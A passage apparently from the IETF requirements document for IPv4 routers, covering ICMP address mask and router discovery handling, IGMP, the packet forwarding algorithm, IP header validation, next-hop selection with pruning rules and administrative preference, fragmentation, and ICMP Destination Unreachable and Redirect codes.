(NTP) to achieve nearly millisecond clock synchronization;
however, this is not required.

4.3.3.9 Address Mask Request/Reply

A router MUST implement support for receiving ICMP Address Mask
Request messages and responding with ICMP Address Mask Reply
messages. These messages are defined in [INTERNET:2].

A router SHOULD have a configuration option for each logical
interface specifying whether the router is allowed to answer Address
Mask Requests for that interface; this option MUST default to
allowing responses. A router MUST NOT respond to an Address Mask
Request before the router knows the correct address mask.

A router MUST NOT respond to an Address Mask Request that has a
source address of 0.0.0.0 and which arrives on a physical interface
that has associated with it multiple logical interfaces and the
address masks for those interfaces are not all the same.

A router SHOULD examine all ICMP Address Mask Replies that it
receives to determine whether the information it contains matches the
router's knowledge of the address mask. If the ICMP Address Mask
Reply appears to be in error, the router SHOULD log the address mask
and the sender's IP address. A router MUST NOT use the contents of
an ICMP Address Mask Reply to determine the correct address mask.

Because hosts may not be able to learn the address mask if a router
is down when the host boots up, a router MAY broadcast a gratuitous
ICMP Address Mask Reply on each of its logical interfaces after it
has configured its own address masks. However, this feature can be
dangerous in environments that use variable length address masks.
Therefore, if this feature is implemented, gratuitous Address Mask
Replies MUST NOT be broadcast over any logical interface(s) which
either:

o Are not configured to send gratuitous Address Mask Replies. Each
logical interface MUST have a configuration parameter controlling
this, and that parameter MUST default to not sending the
gratuitous Address Mask Replies.

o Share subsuming (but not identical) network prefixes and physical
interface.

The { , -1 } form of the IP broadcast address MUST be
used for broadcast Address Mask Replies.

DISCUSSION
The ability to disable sending Address Mask Replies by routers is
required at a few sites that intentionally lie to their hosts
about the address mask. The need for this is expected to go away

as more and more hosts become compliant with the Host Requirements
standards.

The reason for both the second bullet above and the requirement
about which IP broadcast address to use is to prevent problems
when multiple IP network prefixes are in use on the same physical
network.

4.3.3.10 Router Advertisement and Solicitations

An IP router MUST support the router part of the ICMP Router
Discovery Protocol [INTERNET:13] on all connected networks on which
the router supports either IP multicast or IP broadcast addressing.
The implementation MUST include all the configuration variables
specified for routers, with the specified defaults.

DISCUSSION
Routers are not required to implement the host part of the ICMP
Router Discovery Protocol, but might find it useful for operation
while IP forwarding is disabled (i.e., when operating as a host).

DISCUSSION We note that it is quite common for hosts to use RIP
Version 1 as the router discovery protocol. Such hosts listen to
RIP traffic and use and use information extracted from that
traffic to discover routers and to make decisions as to which
router to use as a first-hop router for a given destination.
While this behavior is discouraged, it is still common and
implementors should be aware of it.

4.4 INTERNET GROUP MANAGEMENT PROTOCOL - IGMP

IGMP [INTERNET:4] is a protocol used between hosts and multicast
routers on a single physical network to establish hosts' membership
in particular multicast groups. Multicast routers use this
information, in conjunction with a multicast routing protocol, to
support IP multicast forwarding across the Internet.

A router SHOULD implement the host part of IGMP.

5. INTERNET LAYER - FORWARDING

5.1 INTRODUCTION

This section describes the process of forwarding packets.

5.2 FORWARDING WALK-THROUGH

There is no separate specification of the forwarding function in IP.
Instead, forwarding is covered by the protocol specifications for the
internet layer protocols ([INTERNET:1], [INTERNET:2], [INTERNET:3],
[INTERNET:8], and [ROUTE:11]).

5.2.1 Forwarding Algorithm

Since none of the primary protocol documents describe the forwarding
algorithm in any detail, we present it here. This is just a general
outline, and omits important details, such as handling of congestion,
that are dealt with in later sections.

It is not required that an implementation follow exactly the
algorithms given in sections [5.2.1.1], [5.2.1.2], and [5.2.1.3].
Much of the challenge of writing router software is to maximize the
rate at which the router can forward packets while still achieving
the same effect of the algorithm. Details of how to do that are
beyond the scope of this document, in part because they are heavily
dependent on the architecture of the router. Instead, we merely
point out the order dependencies among the steps:

(1) A router MUST verify the IP header, as described in section
[5.2.2], before performing any actions based on the contents of
the header. This allows the router to detect and discard bad
packets before the expenditure of other resources.

(2) Processing of certain IP options requires that the router insert
its IP address into the option. As noted in Section [5.2.4],
the address inserted MUST be the address of the logical
interface on which the packet is sent or the router's router-id
if the packet is sent over an unnumbered interface. Thus,
processing of these options cannot be completed until after the
output interface is chosen.

(3) The router cannot check and decrement the TTL before checking
whether the packet should be delivered to the router itself, for
reasons mentioned in Section [4.2.2.9].

(4) More generally, when a packet is delivered locally to the router,
its IP header MUST NOT be modified in any way (except that a

router may be required to insert a timestamp into any Timestamp
options in the IP header). Thus, before the router determines
whether the packet is to be delivered locally to the router, it
cannot update the IP header in any way that it is not prepared
to undo.

5.2.1.1 General

This section covers the general forwarding algorithm. This algorithm
applies to all forms of packets to be forwarded: unicast, multicast,
and broadcast.

(1) The router receives the IP packet (plus additional information
about it, as described in Section [3.1]) from the Link Layer.

(2) The router validates the IP header, as described in Section
[5.2.2]. Note that IP reassembly is not done, except on IP
fragments to be queued for local delivery in step (4).

(3) The router performs most of the processing of any IP options. As
described in Section [5.2.4], some IP options require additional
processing after the routing decision has been made.

(4) The router examines the destination IP address of the IP
datagram, as described in Section [5.2.3], to determine how it
should continue to process the IP datagram. There are three
possibilities:

o The IP datagram is destined for the router, and should be
queued for local delivery, doing reassembly if needed.

o The IP datagram is not destined for the router, and should be
queued for forwarding.

o The IP datagram should be queued for forwarding, but (a copy)
must also be queued for local delivery.

5.2.1.2 Unicast

Since the local delivery case is well covered by [INTRO:2], the
following assumes that the IP datagram was queued for forwarding. If
the destination is an IP unicast address:

(5) The forwarder determines the next hop IP address for the packet,
usually by looking up the packet's destination in the router's
routing table. This procedure is described in more detail in
Section [5.2.4]. This procedure also decides which network

interface should be used to send the packet.

(6) The forwarder verifies that forwarding the packet is permitted.
The source and destination addresses should be valid, as
described in Section [5.3.7] and Section [5.3.4] If the router
supports administrative constraints on forwarding, such as those
described in Section [5.3.9], those constraints must be
satisfied.

(7) The forwarder decrements (by at least one) and checks the
packet's TTL, as described in Section [5.3.1].

(8) The forwarder performs any IP option processing that could not be
completed in step 3.

(9) The forwarder performs any necessary IP fragmentation, as
described in Section [4.2.2.7]. Since this step occurs after
outbound interface selection (step 5), all fragments of the same
datagram will be transmitted out the same interface.

(10) The forwarder determines the Link Layer address of the packet's
next hop. The mechanisms for doing this are Link Layer-
dependent (see chapter 3).

(11) The forwarder encapsulates the IP datagram (or each of the
fragments thereof) in an appropriate Link Layer frame and queues
it for output on the interface selected in step 5.

(12) The forwarder sends an ICMP redirect if necessary, as described
in Section [4.3.3.2].

5.2.1.3 Multicast

If the destination is an IP multicast, the following steps are taken.

Note that the main differences between the forwarding of IP unicasts
and the forwarding of IP multicasts are

o IP multicasts are usually forwarded based on both the datagram's
source and destination IP addresses,

o IP multicast uses an expanding ring search,

o IP multicasts are forwarded as Link Level multicasts, and

o ICMP errors are never sent in response to IP multicast datagrams.

Note that the forwarding of IP multicasts is still somewhat
experimental. As a result, the algorithm presented below is not
mandatory, and is provided as an example only.

(5a) Based on the IP source and destination addresses found in the
datagram header, the router determines whether the datagram has
been received on the proper interface for forwarding. If not,
the datagram is dropped silently. The method for determining
the proper receiving interface depends on the multicast routing
algorithm(s) in use. In one of the simplest algorithms, reverse
path forwarding (RPF), the proper interface is the one that
would be used to forward unicasts back to the datagram source.

(6a) Based on the IP source and destination addresses found in the
datagram header, the router determines the datagram's outgoing
interfaces. To implement IP multicast's expanding ring search
(see [INTERNET:4]) a minimum TTL value is specified for each
outgoing interface. A copy of the multicast datagram is
forwarded out each outgoing interface whose minimum TTL value is
less than or equal to the TTL value in the datagram header, by
separately applying the remaining steps on each such interface.

(7a) The router decrements the packet's TTL by one.

(8a) The forwarder performs any IP option processing that could not
be completed in step (3).

(9a) The forwarder performs any necessary IP fragmentation, as
described in Section [4.2.2.7].

(10a) The forwarder determines the Link Layer address to use in the
Link Level encapsulation. The mechanisms for doing this are
Link Layer-dependent. On LANs a Link Level multicast or
broadcast is selected, as an algorithmic translation of the
datagrams' IP multicast address. See the various IP-over-xxx
specifications for more details.

(11a) The forwarder encapsulates the packet (or each of the fragments
thereof) in an appropriate Link Layer frame and queues it for
output on the appropriate interface.

5.2.2 IP Header Validation

Before a router can process any IP packet, it MUST perform a the
following basic validity checks on the packet's IP header to ensure
that the header is meaningful. If the packet fails any of the
following tests, it MUST be silently discarded, and the error SHOULD
be logged.

(1) The packet length reported by the Link Layer must be large enough
to hold the minimum length legal IP datagram (20 bytes).

(2) The IP checksum must be correct.

(3) The IP version number must be 4. If the version number is not 4
then the packet may be another version of IP, such as IPng or
ST-II.

(4) The IP header length field must be large enough to hold the
minimum length legal IP datagram (20 bytes = 5 words).

(5) The IP total length field must be large enough to hold the IP
datagram header, whose length is specified in the IP header
length field.

A router MUST NOT have a configuration option that allows disabling
any of these tests.

If the packet passes the second and third tests, the IP header length
field is at least 4, and both the IP total length field and the
packet length reported by the Link Layer are at least 16 then,
despite the above rule, the router MAY respond with an ICMP Parameter
Problem message, whose pointer points at the IP header length field
(if it failed the fourth test) or the IP total length field (if it
failed the fifth test). However, it still MUST discard the packet
and still SHOULD log the error.

These rules (and this entire document) apply only to version 4 of the
Internet Protocol. These rules should not be construed as
prohibiting routers from supporting other versions of IP.
Furthermore, if a router can truly classify a packet as being some
other version of IP then it ought not treat that packet as an error
packet within the context of this memo.

IMPLEMENTATION
It is desirable for purposes of error reporting, though not always
entirely possible, to determine why a header was invalid. There
are four possible reasons:

o The Link Layer truncated the IP header

o The datagram is using a version of IP other than the standard
one (version 4).

o The IP header has been corrupted in transit.

o The sender generated an illegal IP header.

It is probably desirable to perform the checks in the order
listed, since we believe that this ordering is most likely to
correctly categorize the cause of the error. For purposes of
error reporting, it may also be desirable to check if a packet
that fails these tests has an IP version number indicating IPng or
ST-II; these should be handled according to their respective
specifications.

Additionally, the router SHOULD verify that the packet length
reported by the Link Layer is at least as large as the IP total
length recorded in the packet's IP header. If it appears that the
packet has been truncated, the packet MUST be discarded, the error
SHOULD be logged, and the router SHOULD respond with an ICMP
Parameter Problem message whose pointer points at the IP total length
field.

DISCUSSION
Because any higher layer protocol that concerns itself with data
corruption will detect truncation of the packet data when it
reaches its final destination, it is not absolutely necessary for
routers to perform the check suggested above to maintain protocol
correctness. However, by making this check a router can simplify
considerably the task of determining which hop in the path is
truncating the packets. It will also reduce the expenditure of
resources down-stream from the router in that down-stream systems
will not need to deal with the packet.

Finally, if the destination address in the IP header is not one of
the addresses of the router, the router SHOULD verify that the packet
does not contain a Strict Source and Record Route option. If a
packet fails this test (if it contains a strict source route option),
the router SHOULD log the error and SHOULD respond with an ICMP
Parameter Problem error with the pointer pointing at the offending
packet's IP destination address.

DISCUSSION
Some people might suggest that the router should respond with a
Bad Source Route message instead of a Parameter Problem message.
However, when a packet fails this test, it usually indicates a

protocol error by the previous hop router, whereas Bad Source
Route would suggest that the source host had requested a
nonexistent or broken path through the network.

5.2.3 Local Delivery Decision

When a router receives an IP packet, it must decide whether the
packet is addressed to the router (and should be delivered locally)
or the packet is addressed to another system (and should be handled
by the forwarder). There is also a hybrid case, where certain IP
broadcasts and IP multicasts are both delivered locally and
forwarded. A router MUST determine which of the these three cases
applies using the following rules.

o An unexpired source route option is one whose pointer value does
not point past the last entry in the source route. If the packet
contains an unexpired source route option, the pointer in the
option is advanced until either the pointer does point past the
last address in the option or else the next address is not one of
the router's own addresses. In the latter (normal) case, the
packet is forwarded (and not delivered locally) regardless of the
rules below.

o The packet is delivered locally and not considered for forwarding
in the following cases:

- The packet's destination address exactly matches one of the
router's IP addresses,

- The packet's destination address is a limited broadcast address
({-1, -1}), or

- The packet's destination is an IP multicast address which is
never forwarded (such as 224.0.0.1 or 224.0.0.2) and (at least)
one of the logical interfaces associated with the physical
interface on which the packet arrived is a member of the
destination multicast group.

o The packet is passed to the forwarder AND delivered locally in the
following cases:

- The packet's destination address is an IP broadcast address that
addresses at least one of the router's logical interfaces but
does not address any of the logical interfaces associated with
the physical interface on which the packet arrived

- The packet's destination is an IP multicast address which is
permitted to be forwarded (unlike 224.0.0.1 and 224.0.0.2) and
(at least) one of the logical interfaces associated with the
physical interface on which the packet arrived is a member of
the destination multicast group.

o The packet is delivered locally if the packet's destination address
is an IP broadcast address (other than a limited broadcast
address) that addresses at least one of the logical interfaces
associated with the physical interface on which the packet
arrived. The packet is ALSO passed to the forwarder unless the
link on which the packet arrived uses an IP encapsulation that
does not encapsulate broadcasts differently than unicasts (e.g.,
by using different Link Layer destination addresses).

o The packet is passed to the forwarder in all other cases.

DISCUSSION
The purpose of the requirement in the last sentence of the fourth
bullet is to deal with a directed broadcast to another network
prefix on the same physical cable. Normally, this works as
expected: the sender sends the broadcast to the router as a Link
Layer unicast. The router notes that it arrived as a unicast, and
therefore must be destined for a different network prefix than the
sender sent it on. Therefore, the router can safely send it as a
Link Layer broadcast out the same (physical) interface over which
it arrived. However, if the router can't tell whether the packet
was received as a Link Layer unicast, the sentence ensures that
the router does the safe but wrong thing rather than the unsafe
but right thing.

IMPLEMENTATION
As described in Section [5.3.4], packets received as Link Layer
broadcasts are generally not forwarded. It may be advantageous to
avoid passing to the forwarder packets it would later discard
because of the rules in that section.

Some Link Layers (either because of the hardware or because of
special code in the drivers) can deliver to the router copies of
all Link Layer broadcasts and multicasts it transmits. Use of
this feature can simplify the implementation of cases where a
packet has to both be passed to the forwarder and delivered
locally, since forwarding the packet will automatically cause the
router to receive a copy of the packet that it can then deliver
locally. One must use care in these circumstances to prevent
treating a received loop-back packet as a normal packet that was
received (and then being subject to the rules of forwarding,
etc.).

Even without such a Link Layer, it is of course hardly necessary
to make a copy of an entire packet to queue it both for forwarding
and for local delivery, though care must be taken with fragments,
since reassembly is performed on locally delivered packets but not
on forwarded packets. One simple scheme is to associate a flag
with each packet on the router's output queue that indicates
whether it should be queued for local delivery after it has been
sent.

5.2.4 Determining the Next Hop Address

When a router is going to forward a packet, it must determine whether
it can send it directly to its destination, or whether it needs to
pass it through another router. If the latter, it needs to determine
which router to use. This section explains how these determinations
are made.

This section makes use of the following definitions:

o LSRR - IP Loose Source and Record Route option

o SSRR - IP Strict Source and Record Route option

o Source Route Option - an LSRR or an SSRR

o Ultimate Destination Address - where the packet is being sent to:
the last address in the source route of a source-routed packet, or
the destination address in the IP header of a non-source-routed
packet

o Adjacent - reachable without going through any IP routers

o Next Hop Address - the IP address of the adjacent host or router to
which the packet should be sent next

o IP Destination Address - the ultimate destination address, except
in source routed packets, where it is the next address specified
in the source route

o Immediate Destination - the node, System, router, end-system, or
whatever that is addressed by the IP Destination Address.

5.2.4.1 IP Destination Address

If:

o the destination address in the IP header is one of the addresses of
the router,

o the packet contains a Source Route Option, and

o the pointer in the Source Route Option does not point past the end
of the option,

then the next IP Destination Address is the address pointed at by the
pointer in that option. If:

o the destination address in the IP header is one of the addresses of
the router,

o the packet contains a Source Route Option, and

o the pointer in the Source Route Option points past the end of the
option,

then the message is addressed to the system analyzing the message.

A router MUST use the IP Destination Address, not the Ultimate
Destination Address (the last address in the source route option),
when determining how to handle a packet.

It is an error for more than one source route option to appear in a
datagram. If it receives such a datagram, it SHOULD discard the
packet and reply with an ICMP Parameter Problem message whose pointer
points at the beginning of the second source route option.

5.2.4.2 Local/Remote Decision

After it has been determined that the IP packet needs to be forwarded
according to the rules specified in Section [5.2.3], the following
algorithm MUST be used to determine if the Immediate Destination is
directly accessible (see [INTERNET:2]).

(1) For each network interface that has not been assigned any IP
address (the unnumbered lines as described in Section [2.2.7]),
compare the router-id of the other end of the line to the IP
Destination Address. If they are exactly equal, the packet can
be transmitted through this interface.

DISCUSSION
In other words, the router or host at the remote end of the line
is the destination of the packet or is the next step in the source
route of a source routed packet.

(2) If no network interface has been selected in the first step, for
each IP address assigned to the router:

(a) isolate the network prefix used by the interface.

IMPLEMENTATION
The result of this operation will usually have been computed and
saved during initialization.

(b) Isolate the corresponding set of bits from the IP Destination
Address of the packet.

(c) Compare the resulting network prefixes. If they are equal to
each other, the packet can be transmitted through the
corresponding network interface.

(3) If the destination was neither the router-id of a neighbor on an
unnumbered interface nor a member of a directly connected network
prefix, the IP Destination is accessible only through some other
router. The selection of the router and the next hop IP address
is described in Section [5.2.4.3]. In the case of a host that is
not also a router, this may be the configured default router.

Ongoing work in the IETF [ARCH:9, NRHP] considers some cases such as
when multiple IP (sub)networks are overlaid on the same link layer
network. Barring policy restrictions, hosts and routers using a
common link layer network can directly communicate even if they are
not in the same IP (sub)network, if there is adequate information
present. The Next Hop Routing Protocol (NHRP) enables IP entities to
determine the "optimal" link layer address to be used to traverse
such a link layer network towards a remote destination.

(4) If the selected "next hop" is reachable through an interface
configured to use NHRP, then the following additional steps apply:

(a) Compare the IP Destination Address to the destination addresses
in the NHRP cache. If the address is in the cache, then send
the datagram to the corresponding cached link layer address.
(b) If the address is not in the cache, then construct an NHRP
request packet containing the IP Destination Address. This
message is sent to the NHRP server configured for that
interface. This may be a logically separate process or entity
in the router itself.

(c) The NHRP server will respond with the proper link layer address
to use to transmit the datagram and subsequent datagrams to the
same destination. The system MAY transmit the datagram(s) to
the traditional "next hop" router while awaiting the NHRP reply.

5.2.4.3 Next Hop Address

EDITORS+COMMENTS
The router applies the algorithm in the previous section to
determine if the IP Destination Address is adjacent. If so, the
next hop address is the same as the IP Destination Address.
Otherwise, the packet must be forwarded through another router to
reach its Immediate Destination. The selection of this router is
the topic of this section.

If the packet contains an SSRR, the router MUST discard the packet
and reply with an ICMP Bad Source Route error. Otherwise, the
router looks up the IP Destination Address in its routing table to
determine an appropriate next hop address.

DISCUSSION
Per the IP specification, a Strict Source Route must specify a
sequence of nodes through which the packet must traverse; the
packet must go from one node of the source route to the next,
traversing intermediate networks only. Thus, if the router is not
adjacent to the next step of the source route, the source route
can not be fulfilled. Therefore, the router rejects such with an
ICMP Bad Source Route error.

The goal of the next-hop selection process is to examine the entries
in the router's Forwarding Information Base (FIB) and select the best
route (if there is one) for the packet from those available in the
FIB.

Conceptually, any route lookup algorithm starts out with a set of
candidate routes that consists of the entire contents of the FIB.
The algorithm consists of a series of steps that discard routes from
the set. These steps are referred to as Pruning Rules. Normally,
when the algorithm terminates there is exactly one route remaining in
the set. If the set ever becomes empty, the packet is discarded
because the destination is unreachable. It is also possible for the
algorithm to terminate when more than one route remains in the set.
In this case, the router may arbitrarily discard all but one of them,
or may perform "load-splitting" by choosing whichever of the routes
has been least recently used.

With the exception of rule 3 (Weak TOS), a router MUST use the
following Pruning Rules when selecting a next hop for a packet. If a

router does consider TOS when making next-hop decisions, the Rule 3
must be applied in the order indicated below. These rules MUST be
(conceptually) applied to the FIB in the order that they are
presented. (For some historical perspective, additional pruning
rules, and other common algorithms in use, see Appendix E.)

DISCUSSION
Rule 3 is optional in that Section [5.3.2] says that a router only
SHOULD consider TOS when making forwarding decisions.

(1) Basic Match
This rule discards any routes to destinations other than the
IP Destination Address of the packet. For example, if a
packet's IP Destination Address is 10.144.2.5, this step
would discard a route to net 128.12.0.0/16 but would retain
any routes to the network prefixes 10.0.0.0/8 and
10.144.0.0/16, and any default routes.

More precisely, we assume that each route has a destination
attribute, called route.dest and a corresponding prefix
length, called route.length, to specify which bits of
route.dest are significant. The IP Destination Address of
the packet being forwarded is ip.dest. This rule discards
all routes from the set of candidates except those for which
the most significant route.length bits of route.dest and
ip.dest are equal.

For example, if a packet's IP Destination Address is
10.144.2.5 and there are network prefixes 10.144.1.0/24,
10.144.2.0/24, and 10.144.3.0/24, this rule would keep only
10.144.2.0/24; it is the only route whose prefix has the same
value as the corresponding bits in the IP Destination Address
of the packet.

(2) Longest Match
Longest Match is a refinement of Basic Match, described
above. After performing Basic Match pruning, the algorithm
examines the remaining routes to determine which among them
have the largest route.length values. All except these are
discarded.

For example, if a packet's IP Destination Address is
10.144.2.5 and there are network prefixes 10.144.2.0/24,
10.144.0.0/16, and 10.0.0.0/8, then this rule would keep only
the first (10.144.2.0/24) because its prefix length is
longest.

(3) Weak TOS
Each route has a type of service attribute, called route.tos,
whose possible values are assumed to be identical to those
used in the TOS field of the IP header. Routing protocols
that distribute TOS information fill in route.tos
appropriately in routes they add to the FIB; routes from
other routing protocols are treated as if they have the
default TOS (0000). The TOS field in the IP header of the
packet being routed is called ip.tos.

The set of candidate routes is examined to determine if it
contains any routes for which route.tos = ip.tos. If so, all
routes except those for which route.tos = ip.tos are
discarded. If not, all routes except those for which
route.tos = 0000 are discarded from the set of candidate
routes.

Additional discussion of routing based on Weak TOS may be
found in [ROUTE:11].

DISCUSSION
The effect of this rule is to select only those routes that have a
TOS that matches the TOS requested in the packet. If no such
routes exist then routes with the default TOS are considered.
Routes with a non-default TOS that is not the TOS requested in the
packet are never used, even if such routes are the only available
routes that go to the packet's destination.

(4) Best Metric
Each route has a metric attribute, called route.metric, and a
routing domain identifier, called route.domain. Each member
of the set of candidate routes is compared with each other
member of the set. If route.domain is equal for the two
routes and route.metric is strictly inferior for one when
compared with the other, then the one with the inferior metric
is discarded from the set. The determination of inferior is
usually by a simple arithmetic comparison, though some
protocols may have structured metrics requiring more complex
comparisons.

(5) Vendor Policy
Vendor Policy is sort of a catch-all to make up for the fact
that the previously listed rules are often inadequate to
choose from the possible routes. Vendor Policy pruning rules
are extremely vendor-specific. See section [5.2.4.4].

This algorithm has two distinct disadvantages. Presumably, a
router implementor might develop techniques to deal with these

disadvantages and make them a part of the Vendor Policy pruning
rule.

(1) IS-IS and OSPF route classes are not directly handled.

(2) Path properties other than type of service (e.g., MTU) are
ignored.

It is also worth noting a deficiency in the way that TOS is
supported: routing protocols that support TOS are implicitly
preferred when forwarding packets that have non-zero TOS values.

The Basic Match and Longest Match pruning rules generalize the
treatment of a number of particular types of routes. These routes
are selected in the following, decreasing, order of preference:

(1) Host Route: This is a route to a specific end system.

(2) Hierarchical Network Prefix Routes: This is a route to a
particular network prefix. Note that the FIB may contain
several routes to network prefixes that subsume each other
(one prefix is the other prefix with additional bits). These
are selected in order of decreasing prefix length.

(5) Default Route: This is a route to all networks for which there
are no explicit routes. It is by definition the route whose
prefix length is zero.

If, after application of the pruning rules, the set of routes is
empty (i.e., no routes were found), the packet MUST be discarded
and an appropriate ICMP error generated (ICMP Bad Source Route if
the IP Destination Address came from a source route option;
otherwise, whichever of ICMP Destination Host Unreachable or
Destination Network Unreachable is appropriate, as described in
Section [4.3.3.1]).

5.2.4.4 Administrative Preference

One suggested mechanism for the Vendor Policy Pruning Rule is to
use administrative preference, which is a simple prioritization
algorithm. The idea is to manually prioritize the routes that one
might need to select among.

Each route has associated with it a preference value, based on
various attributes of the route (specific mechanisms for assignment
of preference values are suggested below). This preference value
is an integer in the range [0..255], with zero being the most
preferred and 254 being the least preferred. 255 is a special

value that means that the route should never be used. The first
step in the Vendor Policy pruning rule discards all but the most
preferable routes (and always discards routes whose preference
value is 255).

This policy is not safe in that it can easily be misused to create
routing loops. Since no protocol ensures that the preferences
configured for a router is consistent with the preferences
configured in its neighbors, network managers must exercise care in
configuring preferences.

o Address Match
It is useful to be able to assign a single preference value to
all routes (learned from the same routing domain) to any of a
specified set of destinations, where the set of destinations is
all destinations that match a specified network prefix.

o Route Class
For routing protocols which maintain the distinction, it is
useful to be able to assign a single preference value to all
routes (learned from the same routing domain) which have a
particular route class (intra-area, inter-area, external with
internal metrics, or external with external metrics).

o Interface
It is useful to be able to assign a single preference value to
all routes (learned from a particular routing domain) that would
cause packets to be routed out a particular logical interface on
the router (logical interfaces generally map one-to-one onto the
router's network interfaces, except that any network interface
that has multiple IP addresses will have multiple logical
interfaces associated with it).

o Source router
It is useful to be able to assign a single preference value to
all routes (learned from the same routing domain) that were
learned from any of a set of routers, where the set of routers
are those whose updates have a source address that match a
specified network prefix.

o Originating AS
For routing protocols which provide the information, it is
useful to be able to assign a single preference value to all
routes (learned from a particular routing domain) which
originated in another particular routing domain. For BGP
routes, the originating AS is the first AS listed in the route's
AS_PATH attribute. For OSPF external routes, the originating AS
may be considered to be the low order 16 bits of the route's

external route tag if the tag's Automatic bit is set and the
tag's Path Length is not equal to 3.

o External route tag
It is useful to be able to assign a single preference value to
all OSPF external routes (learned from the same routing domain)
whose external route tags match any of a list of specified
values. Because the external route tag may contain a structured
value, it may be useful to provide the ability to match
particular subfields of the tag.

o AS path
It may be useful to be able to assign a single preference value
to all BGP routes (learned from the same routing domain) whose
AS path "matches" any of a set of specified values. It is not
yet clear exactly what kinds of matches are most useful. A
simple option would be to allow matching of all routes for which
a particular AS number appears (or alternatively, does not
appear) anywhere in the route's AS_PATH attribute. A more
general but somewhat more difficult alternative would be to
allow matching all routes for which the AS path matches a
specified regular expression.

5.2.4.5 Load Splitting

At the end of the Next-hop selection process, multiple routes may
still remain. A router has several options when this occurs. It
may arbitrarily discard some of the routes. It may reduce the
number of candidate routes by comparing metrics of routes from
routing domains that are not considered equivalent. It may retain
more than one route and employ a load-splitting mechanism to divide
traffic among them. Perhaps the only thing that can be said about
the relative merits of the options is that load-splitting is useful
in some situations but not in others, so a wise implementor who
implements load-splitting will also provide a way for the network
manager to disable it.

5.2.5 Unused IP Header Bits: RFC-791 Section 3.1

The IP header contains several reserved bits, in the Type of
Service field and in the Flags field. Routers MUST NOT drop
packets merely because one or more of these reserved bits has a
non-zero value.

Routers MUST ignore and MUST pass through unchanged the values of
these reserved bits. If a router fragments a packet, it MUST copy
these bits into each fragment.

DISCUSSION
Future revisions to the IP protocol may make use of these unused
bits. These rules are intended to ensure that these revisions can
be deployed without having to simultaneously upgrade all routers
in the Internet.

5.2.6 Fragmentation and Reassembly: RFC-791 Section 3.2

As was discussed in Section [4.2.2.7], a router MUST support IP
fragmentation.

A router MUST NOT reassemble any datagram before forwarding it.

DISCUSSION
A few people have suggested that there might be some topologies
where reassembly of transit datagrams by routers might improve
performance. The fact that fragments may take different paths to
the destination precludes safe use of such a feature.

Nothing in this section should be construed to control or limit
fragmentation or reassembly performed as a link layer function by
the router.

Similarly, if an IP datagram is encapsulated in another IP
datagram (e.g., it is tunnelled), that datagram is in turn
fragmented, the fragments must be reassembled in order to forward
the original datagram. This section does not preclude this.

5.2.7 Internet Control Message Protocol - ICMP

General requirements for ICMP were discussed in Section [4.3]. This
section discusses ICMP messages that are sent only by routers.

5.2.7.1 Destination Unreachable

The ICMP Destination Unreachable message is sent by a router in
response to a packet which it cannot forward because the destination
(or next hop) is unreachable or a service is unavailable. Examples
of such cases include a message addressed to a host which is not
there and therefore does not respond to ARP requests, and messages
addressed to network prefixes for which the router has no valid
route.

A router MUST be able to generate ICMP Destination Unreachable
messages and SHOULD choose a response code that most closely matches
the reason the message is being generated.

The following codes are defined in [INTERNET:8] and [INTRO:2]:

0 = Network Unreachable - generated by a router if a forwarding path
(route) to the destination network is not available;

1 = Host Unreachable - generated by a router if a forwarding path
(route) to the destination host on a directly connected network
is not available (does not respond to ARP);

2 = Protocol Unreachable - generated if the transport protocol
designated in a datagram is not supported in the transport layer
of the final destination;

3 = Port Unreachable - generated if the designated transport protocol
(e.g., UDP) is unable to demultiplex the datagram in the
transport layer of the final destination but has no protocol
mechanism to inform the sender;

4 = Fragmentation Needed and DF Set - generated if a router needs to
fragment a datagram but cannot since the DF flag is set;

5 = Source Route Failed - generated if a router cannot forward a
packet to the next hop in a source route option;

6 = Destination Network Unknown - This code SHOULD NOT be generated
since it would imply on the part of the router that the
destination network does not exist (net unreachable code 0
SHOULD be used in place of code 6);

7 = Destination Host Unknown - generated only when a router can
determine (from link layer advice) that the destination host
does not exist;

11 = Network Unreachable For Type Of Service - generated by a router
if a forwarding path (route) to the destination network with the
requested or default TOS is not available;

12 = Host Unreachable For Type Of Service - generated if a router
cannot forward a packet because its route(s) to the destination
do not match either the TOS requested in the datagram or the
default TOS (0).

The following additional codes are hereby defined:

13 = Communication Administratively Prohibited - generated if a
router cannot forward a packet due to administrative filtering;

14 = Host Precedence Violation. Sent by the first hop router to a
host to indicate that a requested precedence is not permitted
for the particular combination of source/destination host or

network, upper layer protocol, and source/destination port;

15 = Precedence cutoff in effect. The network operators have imposed
a minimum level of precedence required for operation, the
datagram was sent with a precedence below this level;

NOTE: [INTRO:2] defined Code 8 for source host isolated. Routers
SHOULD NOT generate Code 8; whichever of Codes 0 (Network
Unreachable) and 1 (Host Unreachable) is appropriate SHOULD be used
instead. [INTRO:2] also defined Code 9 for communication with
destination network administratively prohibited and Code 10 for
communication with destination host administratively prohibited.
These codes were intended for use by end-to-end encryption devices
used by U.S military agencies. Routers SHOULD use the newly defined
Code 13 (Communication Administratively Prohibited) if they
administratively filter packets.

Routers MAY have a configuration option that causes Code 13
(Communication Administratively Prohibited) messages not to be
generated. When this option is enabled, no ICMP error message is
sent in response to a packet that is dropped because its forwarding
is administratively prohibited.

Similarly, routers MAY have a configuration option that causes Code
14 (Host Precedence Violation) and Code 15 (Precedence Cutoff in
Effect) messages not to be generated. When this option is enabled,
no ICMP error message is sent in response to a packet that is dropped
because of a precedence violation.

Routers MUST use Host Unreachable or Destination Host Unknown codes
whenever other hosts on the same destination network might be
reachable; otherwise, the source host may erroneously conclude that
all hosts on the network are unreachable, and that may not be the
case.

[INTERNET:14] describes a slight modification the form of Destination
Unreachable messages containing Code 4 (Fragmentation needed and DF
set). A router MUST use this modified form when originating Code 4
Destination Unreachable messages.

5.2.7.2 Redirect

The ICMP Redirect message is generated to inform a local host the it
should use a different next hop router for a certain class of
traffic.

Routers MUST NOT generate the Redirect for Network or Redirect for
Network and Type of Service messages (Codes 0 and 2) specified in

[INTERNET:8]. Routers MUST be able to generate the Redirect for Host
message (Code 1) and SHOULD be able to generate the Redirect for Type
of Service and Host message (Code 3) specified in [INTERNET:8].

DISCUSSION
If the directly connected network is not subnetted (in the
classical sense), a router can normally generate a network
Redirect that applies to all hosts on a specified remote network.
Using a network rather than a host Redirect may economize slightly
on network traffic and on host routing table storage. However,
the savings are not significant, and subnets create an ambiguity
about the subnet mask to be used to interpret a network Redirect.
In a CIDR environment, it is difficult to specify precisely the
cases in which network Redirects can be used. Therefore, routers
must send only host (or host and type of service) Redirects.

A Code 3 (Redirect for Host and Type of Service) message is generated
when the packet provoking the redirect has a destination for which
the path chosen by the router would depend (in part) on the TOS
requested.

